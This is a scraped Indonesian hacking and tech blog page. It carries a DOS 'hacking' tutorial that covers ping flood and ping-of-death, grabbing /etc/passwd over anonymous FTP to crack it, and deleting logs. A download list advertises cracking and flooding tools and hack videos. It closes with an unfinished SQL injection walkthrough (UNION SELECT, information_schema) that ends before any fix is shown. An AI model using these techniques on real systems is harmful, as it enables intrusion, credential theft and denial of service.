Script Login-Logout PHP

Alhamduillah.. Masih bisa diberi kesempatan untuk berbagi pengetahuan dengan kawan2 ...

Jenis Operator

Dalam setiap bahasa pemrograman, pasti terdapat operator-operator untuk melakukan proses matematika. Nah, kali ini saya ingin menjelaskan mengenai jenis-jenis operator-operator dalam Visual Basic 2008 ...

150 Trik Dasar Windows Yang Masih Tersembunyi

Setelah menginstalasi Windows dan aplikasi-aplikasi lain yang dibutuhkan ke dalam komputer, ada beberapa hal yang seharusnya Kamu lakukan. Di antaranya ...

All About "Blue Screen of Death"

Menurut Wikipedia, Blue Screen of Death (BSOD, Bahasa Inggris: Layar Biru Kematian), atau kadang disebut "layar biru" (bluescreen) saja adalah ...

Archive for Februari 2010

Hacking Menggunakan DOS

Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP

Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.

1. ping
2. tracert
3. telnet
4. ftp
5. netstat

OK, inilah keterangannya.

1. ping

Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.

Cobalah anda ketik perintah ini:

C:\windows>ping/?

*************
Newbie tip: mengetik '/?' setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list


Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.



Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.


Pinging chintan [127.0.0.1] with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

************
Newbie tip: 'localhost' adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********

Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping www.yahoo.com”

Pinging www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:

Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54

Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms



Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.

Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.

***********
Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo....” pada dos prompt maka akan terdapat:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.

Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.... dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.... dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.


3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.


***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang saya dapatkan.




Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.



4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:


! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd /etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.* sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.* gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka [url]http://www.yahoo.com/ [/url]maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80

Sumber : Awan Bejat

Memahami Pesan-pesan Error Browser

=- Intro -=
===========

Saya merasa terpanggil untuk memberikan sebuah tutorial, kali ini saya mau membahas mengenai pesan error yang ada pada saat anda mengakses suatu halaman web.
Mudah-mudahan anda bisa mengambil waktu sejenak untuk membacanya :P.


=- Isi -=
=========

Sewaktu mengakses sebuah halaman web, mis: www.hoogle.com dibaca 'hugel' :D,
sering timbul pesan error yang mungkin bagi sebagian orang tidak memahami arti error yang ditampilkan browser dan bahkan tidak mengindahkannya.

oleh karena itu, saat ini saya akan coba memaparkan beberapa diantaranya :

- 400: bad request,
artinya alamat URL yang diketik salah, atau nggak ada, atau juga anda tidak diberikan hak untuk mengakses document di server.

- 401: unauthorised,
artinya halaman yang anda akses hanya bisa dilihat oleh user yang diberikan hak (otoritas) oleh host atau memiliki password yang tepat.

- 403: forbidden,
artinya hampir sama dengan error 401. Halaman yang diakses diproteksi password atau dibatasi aksesnya.

- 404: not found,
artinya halaman yang anda cari tidak ditemukan diserver. Hal ini bisa terjadi karena halaman yang diminta dihapus atau dipindahkan atau juga diganti namanya.

- 500: internal error,
artinya website yang diakses berisi error dan tidak berfungsi sehingga tidak bisa menampilkan halaman yang diminta.

- 502: bad gateway,
artinya server yang diakses membutuhkan dokumen dari server lain dan mendapat pesan error dari server tersebut.

- 503: service unavailable,
artinya kemungkinan ISP server lagi down, atau sistem kita dan atau gateway internet (jika dalam LAN) tidak bekerja.

- bad file request,
artinya ketika mengakses sebuah halaman yang berisi form yang memiliki fungsi, tetap fungsi tersebut tidak dimengerti oleh browser.

- connection refused by host,
artinya hampir sama dengan error 403 dan 401, pesan ini timbul karena mengakses halaman yang diproteksi password atau user dari suatu domain yang tidak diijinkan untuk mengakses file ini.

- failed dns lookup,
artinya URL yang diakses tidak sesuai dengan format pengalamatan internet.

- file contains no data,
artinya server yang diakses tidak memiliki halaman web. Pesan ini timbul biasanya ketika website sedang melakukan update.

- host unavailable,
artinya Server tempat halaman web yang diakses 'down' atau sedang maintenance.

- host unknown,
artinya Bisa juga server site lagi down atau koneksi ke modem putus.

- network connection refused by server,
artinya server tidak bisa menghandle lebih banyak user lagi yang mengakses.

- permission denied,
Ini merupakan pesan error FTP, ketika anda ingin mengupload file ke FTP site dan administrator tidak mengijinkannya atau juga server terlalu sibuk dan tidak bisa menghandle proses upload.

- server returned extended information,
artinya ketika mengakses sebuah file download dan file tersebut diakses oleh beberapa user lainnya.

- too many connections – try again later,
artinya terlalu banyak koneksi ke website itu, solusinya akses saja www.manadocoding.com, dijamin errornya tidak muncul :D

- too many users,
artinya terlalu banyak user yang mengakses site FTP, dan hanya mengijinkan sejumlah anonymous saja. Jika melewati batas akan keluar pesan error ini.

- unable to locate host,
artinya site server tidak aktif atau modem kehilangan koneksi.

- unable to locate the server,
artinya server tempat web yang diakses tidak ditemukan atau tidak lagi ada - atau URL-nya salah.

- you can't log on as anonymous user,
Pesan error site FTP ini muncul ketika server tidak mengijinkan akses anonymous, atau anonymous user dibatasi jumlah koneksinya.

Pesan-pesan error diatas merupakan error standar, oleh karena itu beberapa programmer web biasanya membuat sendiri pesan kesalahan yang berisi informasi yang lebih berarti daripada pesan error standarnya.


=- Penutup -=

Akhir kata, mudah-mudahan tulisan ini bisa dipahami dan berguna :)


Sumber : SHL

Login di Yahoo Messenger dengan 2 Login Name

nyuwon sewu juragan...cuma ingin berbagi aja...
mungkin g berguna,di buang aja


Login di Yahoo Messenger dengan 2 Login Name

find :

HKEY_CURRENT_USER\Software\yahoo\pager\Test

Setelah itu sorot Test dan klik kanan kemudian pilih NEW dan create DWORD.
Beri nama hasil create tsb dg nama Plural dan isilah nilainya dengan 1 (Decimal).

Untuk kembali normal (nggak bisa multi login) isi nilai decimal dengan angka 0 atau hapus Plural.

Enjoy it ..

Sumber : SHL

DOWNLOAD




































Download Modul (3)

Download Source Code Lain (1)


Download ViRemoval Acep MP (1)

Download Wedash Anti Virus (WAV) 2005 (2)
Download update signatures.db





There are 7 files in our database





Latest Listings



























Category: Download Modul
Download Now!Modul Cara membuat website dengan CMS Mambo Popular Version: 1.0
Submitted Date:  2006/4/30
Description:



Cara membuat website secara lokal dijelaskan di sini, dengan cms Mambo dan web server memakai WAMP

Downloaded 14799 times
 14799  File Size 905 bytes  Supported Platforms Adobe Acrobat  Home Page http://


Rating: 9.00 (1 vote)

Rate this File | Modify | Report Broken File | Tell a Friend | Comments (1)























Category: Download Modul
Download Now!Modul SQL SERVER Popular Version: 1
Submitted Date:  2006/4/30
Description:



Isi dari modul adalah cara attachment database MSSQL server. Yaitu mebuat database dari mdf dan ldf jadi database-nya MSSQL Server. Cuma dalam bahasa inggris euy

Downloaded 5125 times
 5125  File Size 577.15 KB  Supported Platforms Adobe Acrobat  Home Page http://


Rating: 7.00 (2 votes)

Rate this File | Modify | Report Broken File | Tell a Friend | Comments (1)























Category: Download Modul
Download Now!Modul Jaringan Popular Version: 1.0
Submitted Date:  2006/4/30
Description:



Modul tentang jaringan, isinya banyak banget ada TCP/IP, Subnetting dan troubel shooting tentang jaringan

Downloaded 25355 times
 25355  File Size 571.29 KB  Supported Platforms Acrobat Reader  Home Page http://


Rating: 5.00 (5 votes)

Rate this File | Modify | Report Broken File | Tell a Friend | Comments (0)























Category: Download Source Code Lain
Download Now!Download anti sothink program dan Source code Popular Version: 0.1b
Submitted Date:  2006/4/22
Description:



Ternyata membuat virus itu tidak hanya dikategorikan sebagai perbuatan jahat, tapi boisa dikategorikan berbuat baik. Loh kok bisa mas. Iya karena dengan membuat virus kita juga dapat membantu para designer flash yang sudah capek2 membuat file .swf tetapi dibongkar dengan sothink. Coba antisothink untuk melindunginya...

Downloaded 9607 times
 9607  File Size 16.60 KB  Supported Platforms Windows  Home Page http://


Rating: 8.00 (6 votes)

Rate this File | Modify | Report Broken File | Tell a Friend | Comments (1)























Category: Download Wedash Anti Virus (WAV) 2005 Download update signatures.db
Download Now!Download update signatures.db Popular Version: 1.0
Submitted Date:  2006/4/20
Description:


Update Anti Virus untuk Virus w32.Rontokbro@mm,virus diary.exe atau virus

Karena banyaknya virus yang bermunculan, maka DSI meng-update anti virus tersebut
caranya tinggal, copy file yang telah didownload SIGNATURES.DB ke directory program antivirus, terima kasih

Downloaded 20038 times
 20038  File Size 1.95 KB  Supported Platforms Windows  Home Page http://

Rating: 8.00 (6 votes)

Rate this File | Modify | Report Broken File | Tell a Friend | Comments (3)























Category: Download ViRemoval Acep MP
Download Now!Download ViRemoval Acep MP Popular Version: 1.0
Submitted Date:  2006/4/20
Description:




Software : ViRemoval
Programmer : acepmp
Build : Borland Delphi

Satu lagi virus removal lokal. Lebih rapi n yang pasti lebih mudah digunakan, dibuat lagi oleh acepmp. Mengatasi virus lokal sekitar 45 virus list yang terdaftar...termasuk virus luar juga lohx.

KELEBIHAN LAIN

dibuat-nya Viremoval CRC32 ini karena URemoval CRC32 dibuat dari visual basic yang sangat tergantung sekali dengan "msvbvm60.dll" jadi saya buat dari borland delphi 7.0 tapi sayang sekali kalo nggak dicompress file ini bisa sampe 814 kbyte (salah satu kekurangan delphi non .net version), setelah saya compress menjadi 295 kbyte.

ViRemoval CRC32 mempunyai Feature:
- Kill taskmanager ( untuk menutup applikasi sesuai
daftar prosess )
- command prompt ( antisipasi untuk virus yang
menutup fasilitas Run )
- MSConfig ( antisipasi untuk virus yang menutup
fasilitas Run )
- Registry Editor ( antisipasi untuk virus yang
menutup fasilitas Run )
- MSInfo
- Backup, Restart, Shutdown
- Buat database, dan Fasilitas melihat database
- Stay on top

Downloaded 11653 times
 11653  File Size 290 bytes  Supported Platforms Windows  Home Page http://


Rating: 7.00 (4 votes)

Rate this File | Modify | Report Broken File | Tell a Friend | Comments (1)























Category: Download Wedash Anti Virus (WAV) 2005
Download Now!Wedash Anti Virus 2005 (Server 1) Popular Version: 01b
Submitted Date:  2006/4/20
Description:




Wedash Anti Virus 2005
Submitted by aat on Thu, 2006-01-05 18:01.

Wedash Anti Virus 2005 (WAV) adalah program untuk mendeteksi dan menangani virus lokal ataupun luar yang telah tersebar luas. Program ini freeware, anda dapat mengupdate sendiri virus listnya tanpa harus mendonlot dari internet jika anda menemukan virus baru. Anda dapat mendonlot WAV 2005 exe-nya, installer dan update (signatures.db). Selain itu ada dokumentasi untuk menjalankan program WAV tersebut berbentuk .doc. Dalam waktu dekat akan dirilis atau dibagikan source code WAV untuk dikembangkan secara massal (rame rame mas!)

Anti Virus untuk Virus w32.Rontokbro@mm atau virus
brontok (dan virus lokal lainnya)
Program penetralisir virus lokal atau WAV (Wedash Anti Virus) masih
mempunyai versi beta, karena program tersebut masih jauh dibanding
dengan Norton Anti Virus, Norman Anti Virus, mcAfee dan lain-lain.
Program ini dapat mendeteksi beberapa virus lokal yaitu, w32.Rontokbro@mm,
Hallo.roro.htt, kangen dan riyani_jangkaru. Program bersifat freeware,
siapa saja dapat mendownloadnya.

Downloaded 21074 times
 21074  File Size 0 bytes  Supported Platforms Windows  Home Page http://


Rating: 6.00 (13 votes)

Rate this File | Modify | Report Broken File | Tell a Friend | Comments (6)











Tools Buku SENI PEMROGRAMAN VIRUS MENGGUNAKAN VISUAL BASIC





Tools Buku 4 HARI MENJADI HACKER








Tools Buku RAHASIA MEMBUAT ANTIVIRUS MENGGUNAKAN VB







Tools Buku HACKING INTERNET BANKING






Tools Buku 112 JURUS MENGUASAI KOMPUTER / PC DENGAN TOOLS PEMBANTU






Tools Buku SENI PEMROGRAMAN APLIKASI EXTREME CODING MENGGUNAKAN VB





Tools Buku SENI HACKING MENGGUNAKAN TROJAN



1. Video Hack IIS/Asp Dgn Windonws98


2. Video Hack PHP Nuke


3. Video Hack PHP Nuke II


4. Video Hack PHP Injection


5. Video Hack Mambo



6. Video Hack PhpGedView


7. Video Hack PhpCoin


8. Video Hack HpMaker


9. Video Hack Catalog


10.Video Hack Catalog II (Cpath)



11.Video Hack Forum PhpBB2


12.Video Hack Buku Tamu


13.Video Hack Via Advanced Guestbook


14.Video Hack CGI


15.Video Hack Mass Deface



16.Video Hack Email Yahoo


17.Video Remote Client


18.Video Membuat PsyBNC


19.Video Membuat PsyBNC II




Download WinRar






1. Crack CVV2


2. Open Pass MDB


3. Resource Hacker


4. Hide In Picture


5. SQL Scan



6. SQL Injection Scan


7. Backdoor Scan


8. CGI Scan


9. FTP Cracker


10.Brutus



11.Happy Browser


12.Web Links


13.Win32 Whois


14.Ip Flooder


15.Flood Web



16.Http Bomber


17.Mail Bomb


18.Remote Anything


19.Radmin


20.Validasi Kartu Kredit


21.Togel Online


22.Anti Virus Brontok



23.Anti Virus Brontok, Riyani Jangkaru, Hallo Roro


24.JH Flax


25.PDF to Word









Download Winzip



Teknik Patch Simple Common Web Attack

Assalamualaikum semuanya…….


Kali ini saya akan berbagi bagaimana cara Menangkal serangan2 umum teknik hacking pada vuln-vuln website yang sering dilakukan tanpa sengaja oleh seorang programmer web…..


Teknik-teknik serangan yang akan kita bahas cara menangkalnya adalah :


1. XSS


2. SQLInjection


3. LFI / RFI


4. Bypass Login



5. Filter Upload file


Siap, teknik serangannya perlu dibahas juga ga ya…….. hehehe, oke deh akan saya bahas juga.



1. XSS


XSS adalah kepanjangan dari Cross Site Scripting. Maksudnya??? Hal ini terjadi ketika programmer menggunakan URL sebagai parsing kalimat atau kata secara langsung pada halaman website.


Ok contohnya seperti ini:


http://www.target.com/index.php?id=560&judul=Rekayasa%20Perangkat%20Lunak


Selanjutnya kalimat yang diletakkan pada get_variable judul akan langsung saja ditampilkan pada halaman penerima, pada contoh ini sang attacker dapat menyelipkan sebuah script pada get_variable tersebut. contohnya.


http://www.target.com/index.php?id=560&judul=<script>alert(’Tes XSS!!!’);</script>



<script>alert(’Tes XSS!!!’);</script> script ini merupakan script javascript yang digunakan untuk menampilkan sebuah alert box. Pada kasus yang lebih gawat serangan XSS juga dapat dilakukan untuk mendapatkan cookies website, fake interface dan lain2, maklum saya bukan attacker jadi kurang terlalu paham.


PENANGKAL


Untuk menangkal serangan ini, kita dapat menambahkan function php htmlentities. Fungsi dari function ini adalah untuk menerjemahkan karakter yang termasuk dalam pembentuk html ke dalam karakter codenya….


Contoh code pembentuknya dapat dilihat pada tabel berikut




















































































ResultDescriptionEntity NameEntity Number
non-breaking space&nbsp;&#160;
<less than&lt;&#60;
>greater than&gt;&#62;
&ampersand&amp;&#38;
¢cent&cent;&#162;
£pound&pound;&#163;
¥yen&yen;&#165;
euro&euro;&#8364;
§section&sect;&#167;
©copyright&copy;&#169;
®registered trademark&reg;&#174;

Cara pakai function ini :


<?php


$judul = htmlentities ($_GET['judul']);


echo $judul;



?>


$judul = htmlentities ($_GET['judul']); <<<—- Disini ditambahkan funtion tersebut untuk merubah semua karakter html ke karakter pembentuknya…


Sukses……… Sekarang Website kita sudah terbebas dari serangan XSS.


2. SQLInjection


Bagi penggiat dunia hacking, mungkin istilah ini sudah tidak asing lagi. Hm…….. ya, super simple basic web attacking technique (bener ga ya bahasanya). Ya, teknik serangan website paling dasar.


Bug ini terjadi karena kesalah yang terjadi ketika dilakukan perintah _select query pada tabel dalam database.


Contohnya dulu.


Misal url yang tampak pada address bar seperti ini



http://www.target.com/index.php?id=560


Maksud dari url ini untuk menampilkan berita atau artikel atau apalah yang memiliki id 560 pada tabel dalam database.


Selanjutnya pada halaman penerima dilakukan query untuk meminta isi record tabel yang memiliki id 560.


contoh :


<?php


include “‘connect.php”;


mysql_select_db (”db_web”, $con);


$id = $_GET['id'];


$result = mysql_query (”select * from `tblBerita` where `id` = $id “);



dan seterusnya….


?>


Yang kita gunakan untuk permisalah adalah id = 560, baik kita coba terjemahkan query sql nya.


“select * from `tblBerita` where `id` = 560″


SQLInjection


1. Teknik serangan SQLinjection dimulai dengan mengetes suatu get_variable dengan menambahkan karakter single quote (’)


http://www.target.com/index.php?id=560′


Selanjutnya pada query sql yang ada pada script akan berubah menjadi


select * from `tblBerita` where `id` = 560′ << terdapat karakter petik satu.



Hal ini menyebabkan query error dan menampilkan pesan error nya pada halaman website.


2. Dengan tanda error ini, selanjutnya sang attacker melanjutkan melakukan inject pada query sql ini dengan tujuan menampilkan informasi yang ada pada tabel user, admin atau nama tabel lain untuk mengetahui user dan password yang tersimpan dalam website.


HOW???? HOW????? Caranya bagaimana. Pada MYSQL versi 5, hal ini dapat dilakukan dengan memanfaatkan informasi yang terdapat pada database information_schema.


Kita lanjut dulu saja SQLInjectionnya.


Selanjutnya kita akan coba cari jumlah record yang ada pada tabel.


http://www.target.com/index.php?id=560 order by 1


Kita tes apakah error atau tidak, seharusnya tidak.


select * from `tblBerita` where `id` = 560 order by 1


Maksud query ini, hasil select dirutkan berdasarkan pada colomn nomer 1.



Coba terus sampai tampil pesan error


http://www.target.com/index.php?id=560 order by 2 <<<— masih belum error


http://www.target.com/index.php?id=560 order by 3 <<<— masih belum error


http://www.target.com/index.php?id=560 order by 4 <<<— masih belum error


http://www.target.com/index.php?id=560 order by 5 <<<— akhirnya error juga



Ini misal aja loh ya, di lapangan ntar jumlah angkanya bisa berbeda-beda. Ini menandakan bahawa field atau colomn yang ada pada tabel hanya ada 4.


3. Selanjutnya, lakukan union select


http://www.target.com/index.php?id=560 and 1=2 union select 1, 2, 3, 4


Query pada web jadi seperti ini


select * from `tblBerita` where `id` = 560 and 1=2 union select 1, 2, 3, 4


Result aslinya tidak akan tampil, yang tampil malah angka-angka yang dijadikan union select. Kita cari angka mana yang tampil pada halaman website. Misal angka yang tampil pada halaman website angka 2.


4. Kita dapat menggunakan function2 sql pada url tersebut, contohnya version()


http://www.target.com/index.php?id=560 and 1=2 union select 1, version(), 3, 4



Fungsi ini berguna untuk menampilkan versi mysql yang digunakan, jika versi mysql adalah versi 5. Kida dapat mulai melakukan inject untuk menampilkan informasi yang ada pada database information schema.


http://www.target.com/index.php?id=560 and 1=2 union select 1, group_concat(table_name), 3, 4 from information_schema.tables where table_schema = database()


